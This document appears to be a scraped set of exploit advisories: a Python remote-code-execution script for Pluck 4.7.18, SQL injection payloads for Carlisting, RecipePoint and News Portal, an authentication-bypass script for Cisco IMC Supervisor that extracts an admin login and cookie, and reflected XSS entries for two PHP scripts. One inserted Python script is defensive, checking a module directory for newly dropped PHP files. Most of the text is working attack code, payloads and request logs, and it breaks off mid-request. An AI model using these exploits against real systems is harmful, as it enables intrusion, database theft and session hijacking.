<pre><code>#Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)<br />#Application: pluck<br />#Version: 4.7.18<br />#Bugs: RCE<br />#Technology: PHP<br />#Vendor URL: https://github.com/pluck-cms/pluck<br />#Software Link: https://github.com/pluck-cms/pluck<br />#Date found: 10-07-2023<br />#Author: Mirabbas Ağalarov<br />#Tested on: Linux<br /><br /><br />import requests<br />from requests_toolbelt.multipart.encoder import MultipartEncoder<br /><br />login_url = "http://localhost/pluck/login.php"<br />upload_url = "http://localhost/pluck/admin.php?action=installmodule"<br />headers = {"Referer": login_url}<br />login_payload = {"cont1": "admin", "bogus": "", "submit": "Log in"}<br /><br />file_path = input("ZIP file path: ")<br /><br />multipart_data = MultipartEncoder(<br />    fields={<br />        "sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"),<br />        "submit": "Upload"<br />    }<br />)<br /><br />session = requests.Session()<br />login_response = session.post(login_url, headers=headers, data=login_payload)<br /><br />if login_response.status_code == 200:<br />    print("Login account")<br /><br />    upload_headers = {<br />        "Referer": upload_url,<br />        "Content-Type": multipart_data.content_type<br />    }<br />    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)<br /><br />    if upload_response.status_code == 200:<br />        print("ZIP file uploaded.")<br />    else:<br />        print("ZIP file upload error. Response code:", upload_response.status_code)<br />else:<br />    print("Login problem. Response code:", login_response.status_code)<br /><br /><br />rce_url = "http://localhost/pluck/data/modules/mirabbas/miri.php"<br /><br />rce = requests.get(rce_url)<br /><br />print(rce.text)<br /></code></pre>
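The PoC above leaves a new PHP file under data/modules/ on the server. The following is an added defensive example, not code from the advisory or from Pluck: it snapshots the module directory after a known-good install and alerts when executable files appear or change. The suffix list, file names and the directory tree built in demo() are assumptions constructed for the run.

```python
"""Baseline-and-diff check for the Pluck module tree (data/modules/).

Added example; not code from the advisory above or from Pluck. The PoC's
post-exploitation artifact is a new PHP file under data/modules/<module>/
(data/modules/mirabbas/miri.php), so the defensive counterpart is to
snapshot that tree after a known-good install and alert when executable
files appear or change. The tree built in demo() is constructed; point
snapshot() at the real data/modules directory in production.
"""
from __future__ import annotations

import hashlib
import json
import tempfile
from pathlib import Path

# Suffixes the PHP handler executes; assumption for a stock Apache/PHP host.
EXECUTABLE_SUFFIXES = {".php", ".php5", ".php7", ".phtml", ".phar"}


def snapshot(modules_dir: str | Path) -> dict[str, str]:
    """Map every file under modules_dir (relative POSIX path) to its SHA-256."""
    root = Path(modules_dir)
    manifest = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        manifest[path.relative_to(root).as_posix()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def save_manifest(manifest: dict[str, str], path: str | Path) -> None:
    Path(path).write_text(json.dumps(manifest, indent=2, sort_keys=True))


def load_manifest(path: str | Path) -> dict[str, str]:
    return json.loads(Path(path).read_text())


def diff_manifests(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Classify paths as added, removed or modified between two snapshots."""
    both = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in both if baseline[p] != current[p]),
    }


def executable_changes(delta: dict[str, list[str]]) -> list[str]:
    """Return added or modified entries the web server would execute.

    A module installed legitimately by an administrator shows up here too;
    the alert is the prompt to confirm that install was actually authorised.
    """
    return [
        f"{kind}: {rel}"
        for kind in ("added", "modified")
        for rel in delta[kind]
        if Path(rel).suffix.lower() in EXECUTABLE_SUFFIXES
    ]


def demo() -> list[str]:
    """Reproduce the advisory's outcome on a constructed module tree."""
    with tempfile.TemporaryDirectory() as tmp:
        modules = Path(tmp) / "data" / "modules"
        # Known-good state: one legitimate module with its stylesheet.
        (modules / "contactform").mkdir(parents=True)
        (modules / "contactform" / "contactform.php").write_text("<?php // legitimate module\n")
        (modules / "contactform" / "style.css").write_text("body {}\n")
        baseline_file = Path(tmp) / "modules.baseline.json"
        save_manifest(snapshot(modules), baseline_file)

        # What the PoC leaves behind: a new module directory holding a PHP file.
        (modules / "mirabbas").mkdir()
        (modules / "mirabbas" / "miri.php").write_text("<?php // dropped by the PoC\n")
        # A non-executable edit must not raise an alert.
        (modules / "contactform" / "style.css").write_text("body { margin: 0 }\n")

        delta = diff_manifests(load_manifest(baseline_file), snapshot(modules))
        return executable_changes(delta)


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

Run the baseline step once after a clean install and the diff step from cron; a hit on a path nobody installed is the signal to pull the file and the admin-panel access log.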
<pre><code># Exploit Title: Carlisting 1.6 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 16/07/2023<br /># Vendor: phpscriptpoint<br /># Vendor Homepage: https://phpscriptpoint.com/<br /># Software Link: https://demo.phpscriptpoint.com/carlisting/<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /><br /><br /><br />## Description<br /><br />SQL injection attacks can allow unauthorized access to sensitive data and modification of<br />data, and can crash the application or make it unavailable, leading to lost revenue and<br />damage to a company's reputation.<br /><br /><br /><br />Path: /carlisting/search.php<br /><br />GET parameter 'brand_id' is vulnerable to SQL Injection<br />GET parameter 'model_id' is vulnerable to SQL Injection<br />GET parameter 'car_condition' is vulnerable to SQL Injection<br />GET parameter 'car_category_id' is vulnerable to SQL Injection<br />GET parameter 'body_type_id' is vulnerable to SQL Injection<br />GET parameter 'fuel_type_id' is vulnerable to SQL Injection<br />GET parameter 'transmission_type_id' is vulnerable to SQL Injection<br />GET parameter 'year' is vulnerable to SQL Injection<br />GET parameter 'mileage_start' is vulnerable to SQL Injection<br />GET parameter 'mileage_end' is vulnerable to SQL Injection<br />GET parameter 'country' is vulnerable to SQL Injection<br />GET parameter 'state' is vulnerable to SQL Injection<br />GET parameter 'city' is vulnerable to SQL Injection<br /><br />https://website/carlisting/search.php?brand_id=[SQLI]&model_id=[SQLI]&car_condition=[SQLI]&price_range=1&car_category_id=[SQLI]&body_type_id=[SQLI]&fuel_type_id=[SQLI]&transmission_type_id=[SQLI]&year=[SQLI]&mileage_start=[SQLI]&mileage_end=[SQLI]&country=[SQLI]&state=[SQLI]&city=[SQLI]<br /><br /><br />---<br />Parameter: brand_id (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1 AND (SELECT(0)FROM(SELECT 
COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los<br /><br />Parameter: model_id (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los<br /><br />Parameter: car_condition (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los<br /><br />Parameter: car_category_id (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los<br /><br />Parameter: body_type_id (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - 
WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los<br /><br />Parameter: fuel_type_id (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los<br /><br />Parameter: transmission_type_id (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los<br /><br />Parameter: year (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los<br /><br 
/>Parameter: mileage_start (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10) AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&mileage_end=200&country=USA&state=CA&city=Los<br /><br />Parameter: mileage_end (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200) AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&country=USA&state=CA&city=Los<br /><br />Parameter: country (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&state=CA&city=Los<br /><br />Parameter: state (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA' AND (SELECT(0)FROM(SELECT 
COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&city=Los<br /><br />Parameter: city (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW<br />---<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: RecipePoint 1.9 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 15/07/2023<br /># Vendor: phpscriptpoint<br /># Vendor Homepage: https://phpscriptpoint.com/<br /># Software Link: https://demo.phpscriptpoint.com/recipepoint/<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /><br /><br /><br />## Description<br /><br />SQL injection attacks can allow unauthorized access to sensitive data and modification of<br />data, and can crash the application or make it unavailable, leading to lost revenue and<br />damage to a company's reputation.<br /><br /><br /><br />Path: /recipepoint/recipe-result<br /><br />GET parameter 'text' is vulnerable to SQL Injection<br />GET parameter 'category' is vulnerable to SQL Injection<br />GET parameter 'type' is vulnerable to SQL Injection<br />GET parameter 'difficulty' is vulnerable to SQL Injection<br />GET parameter 'cuisine' is vulnerable to SQL Injection<br />GET parameter 'cooking_method' is vulnerable to SQL Injection<br /><br /><br />https://website/recipepoint/recipe-result?text=[SQLI]&category=[SQLI]&type=[SQLI]&difficulty=[SQLI]&cuisine=[SQLI]&cooking_method=[SQLI]<br /><br /><br />---<br />Parameter: text (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: text=") AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1<br /><br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: text=") OR NOT 07033=7033-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1<br /><br />Parameter: category (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: 
text=&category=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1<br /><br />Parameter: type (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: text=&category=7&type=Free"XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR"Z&difficulty=Beginner&cuisine=2&cooking_method=1<br /><br />Parameter: difficulty (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: text=&category=7&type=Free&difficulty=Beginner"XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR"Z&cuisine=2&cooking_method=1<br /><br />Parameter: cuisine (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&cooking_method=1<br /><br />Parameter: cooking_method (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=(SELECT(0)FROM(SELECT(SLEEP(5)))a)<br />---<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>"""<br />[+] Exploit Title: Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass<br />[+] Cisco IMC Supervisor - < 2.2.1.0<br />[+] Date: 08/21/2019<br />[+] Affected Component: /app/ui/ClientServlet?apiName=GetUserInfo<br />[+] Vendor: https://www.cisco.com/c/en/us/products/servers-unified-computing/integrated-management-controller-imc-supervisor/index.html<br />[+] Vulnerability Discovery : Pedro Ribeiro<br />[+] Exploit Author: Fatih Sencer<br />[+] CVE: CVE-2019-1937<br />----------------------------------------------------<br /><br />Usage:<br /><br />./python3 CiscoIMC-Bypass.py -u host<br /><br />[+] Target https://xxxxxx.com<br />[+] Target OK<br />[+] Exploit Success<br />[+] Login name : admin<br />[+] Cookie : REDACTED<br /><br />"""<br /><br />import argparse, requests, warnings, json, random, string<br />from requests.packages.urllib3.exceptions import InsecureRequestWarning<br /><br />warnings.simplefilter('ignore', InsecureRequestWarning)<br /><br /><br />def init():<br />    parser = argparse.ArgumentParser(description='Cisco IMC Supervisor / Authentication Bypass')<br />    parser.add_argument('-u', '--host', help='Host', type=str, required=True)<br />    args = parser.parse_args()<br />    exploit(args)<br /><br /><br />def exploit(args):<br />    session = requests.Session()<br />    headers = {<br />        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4)",<br />        "X-Requested-With": "XMLHttpRequest",<br />        "Referer": "https://{}/".format(args.host),<br />        "X-Starship-UserSession-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)),<br />        "X-Starship-Request-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))<br />    }<br />    target = "https://{}/app/ui/ClientServlet?apiName=GetUserInfo".format(args.host)<br />    print("[+] Target {}".format(args.host))<br /><br />    exp_send = session.get(target, headers=headers, verify=False, timeout=10)<br /><br />    if exp_send.status_code == 200:<br />        print("[+] Target OK")<br />        body_data = json.loads(exp_send.text)<br />        if body_data.get('loginName') is not None:<br />            print("[+] Exploit Success")<br />            print("[+] Login name : {}".format(body_data.get('loginName')))<br />            print("[+] Cookie : {}".format(session.cookies.get_dict()))<br />        else:<br />            print("[-] Exploit Failed")<br />    else:<br />        print("[-] N/A")<br />        exit()<br /><br /><br />if __name__ == "__main__":<br />    init()<br /></code></pre>
<pre><code># Exploit Title: Lawyer CMS 1.6 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 16/07/2023<br /># Vendor: phpscriptpoint<br /># Vendor Homepage: https://phpscriptpoint.com/<br /># Software Link: https://demo.phpscriptpoint.com/lawyer/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br /><br />## Description<br /><br />An attacker can send the victim a link containing a malicious URL in an email or instant message and<br />can then perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br /><br />Path: /lawyer/page.php<br /><br />The URL path (the segment after page.php) is vulnerable to RXSS<br /><br />https://website/lawyer/page.php/[XSS]?slug=blog&page=2<br /><br /><br />Path: /lawyer/search.php<br /><br />The URL path (the segment after search.php) is vulnerable to RXSS<br /><br />https://website/lawyer/search.php/[XSS]?search_string=&page=2<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: JobSeeker 1.5 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 15/07/2023<br /># Vendor: phpscriptpoint<br /># Vendor Homepage: https://phpscriptpoint.com/<br /># Software Link: https://demo.phpscriptpoint.com/jobseeker/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br /><br />## Description<br /><br />An attacker can send the victim a link containing a malicious URL in an email or instant message and<br />can then perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br /><br />Path: /jobseeker/search-result.php<br /><br />GET parameter 'kw' is vulnerable to RXSS<br />GET parameter 'lc' is vulnerable to RXSS<br />GET parameter 'ct' is vulnerable to RXSS<br />GET parameter 'cp' is vulnerable to RXSS<br />GET parameter 'p' is vulnerable to RXSS<br /><br /><br />https://website/jobseeker/search-result.php?kw=[XSS]&lc=[XSS]&ct=[XSS]&cp=[XSS]&p=[XSS]<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: News Portal v4.0 - SQL Injection (Unauthorized)<br /># Date: 09/07/2023<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: hub.woj12345@gmail.com<br /># Vendor Homepage: https://phpgurukul.com/news-portal-project-in-php-and-mysql/c<br /># Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7643<br /># Version: 4.0<br /># We are looking for work security engineer, security administrator: https://www.pracuj.pl/praca/security-engineer-warszawa-plocka-9-11,oferta,1002635314<br /># Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />## Example 1<br />-----------------------------------------------------------------------------------------------------------------------<br />Param: name, email, comment<br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br />POST /newsportal/news-details.php?nid=13 HTTP/1.1<br />Origin: http://127.0.0.1<br />Sec-Fetch-User: ?1<br />Host: 127.0.0.1:80<br />Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7<br />Accept-Encoding: gzip, deflate<br />Sec-Fetch-Site: same-origin<br />sec-ch-ua-mobile: ?0<br />Content-Length: 277<br />Sec-Fetch-Mode: navigate<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36<br />Connection: close<br />Referer: http://127.0.0.1/newsportal/news-details.php?nid=13<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />sec-ch-ua-platform: "Windows"<br />Cache-Control: max-age=0<br />Content-Type: application/x-www-form-urlencoded<br />sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"<br />Sec-Fetch-Dest: document<br 
/><br />csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit<br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Sun, 09 Jul 2023 10:55:26 GMT<br />Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17<br />X-Powered-By: PHP/8.1.17<br />Set-Cookie: PHPSESSID=l7dg3s1in50ojjigs4vm2p0r9s; path=/<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 146161<br /><br /><script>alert('comment successfully submit. 
Comment will be display after admin review ');</script><br /><!DOCTYPE html><br /><html lang="en"><br /><br /> <head><br /><br /> <meta charset="utf-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><br /> <meta name="description" content=""><br /> <meta name="author" content=""><br /><br /> <title>News Portal | Home Page<br /> [...]<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br />POST /newsportal/news-details.php?nid=13 HTTP/1.1<br />Origin: http://127.0.0.1<br />Sec-Fetch-User: ?1<br />Host: 127.0.0.1:80<br />Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7<br />Accept-Encoding: gzip, deflate<br />Sec-Fetch-Site: same-origin<br />sec-ch-ua-mobile: ?0<br />Content-Length: 276<br />Sec-Fetch-Mode: navigate<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36<br />Connection: close<br />Referer: http://127.0.0.1/newsportal/news-details.php?nid=13<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />sec-ch-ua-platform: "Windows"<br />Cache-Control: max-age=0<br />Content-Type: application/x-www-form-urlencoded<br />sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"<br />Sec-Fetch-Dest: document<br /><br />csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit<br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br 
/>-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Sun, 09 Jul 2023 10:56:06 GMT<br />Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17<br />X-Powered-By: PHP/8.1.17<br />Set-Cookie: PHPSESSID=fcju4nb9mr2tu80mqv5cnduldk; path=/<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 525<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><br /><br /><b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'admin@local.host','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21<br />Stack trace:<br />#0 C:\xampp3\htdocs\newsportal\news-details.php(21): mysqli_query(Object(mysqli), 'insert into tbl...')<br />#1 {main}<br /> thrown in <b>C:\xampp3\htdocs\newsportal\news-details.php</b> on line <b>21</b><br />-----------------------------------------------------------------------------------------------------------------------<br />SQLMap example param 'comment':<br />-----------------------------------------------------------------------------------------------------------------------<br />sqlmap identified the following injection point(s) with a total of 450 HTTP(s) requests:<br />---<br />Parameter: #2* ((custom) POST)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' RLIKE (SELECT (CASE WHEN (3649=3649) THEN 0x7373737373737373737373737373737373737373737373737373 ELSE 0x28 END)) AND 'xRsB'='xRsB&submit=<br /><br /> Type: error-based<br /> 
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' OR (SELECT 6120 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(6120=6120,1))),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'odEK'='odEK&submit=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' AND (SELECT 1610 FROM (SELECT(SLEEP(5)))mZUx) AND 'bjco'='bjco&submit=<br />---<br />web application technology: PHP 8.1.17, Apache 2.4.56<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br /><br />## Example 2 - login to administration panel<br />-----------------------------------------------------------------------------------------------------------------------<br />Param: username<br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br />POST /newsportal/admin/ HTTP/1.1<br />Host: 127.0.0.1<br />Content-Length: 42<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://127.0.0.1<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36<br />Accept: 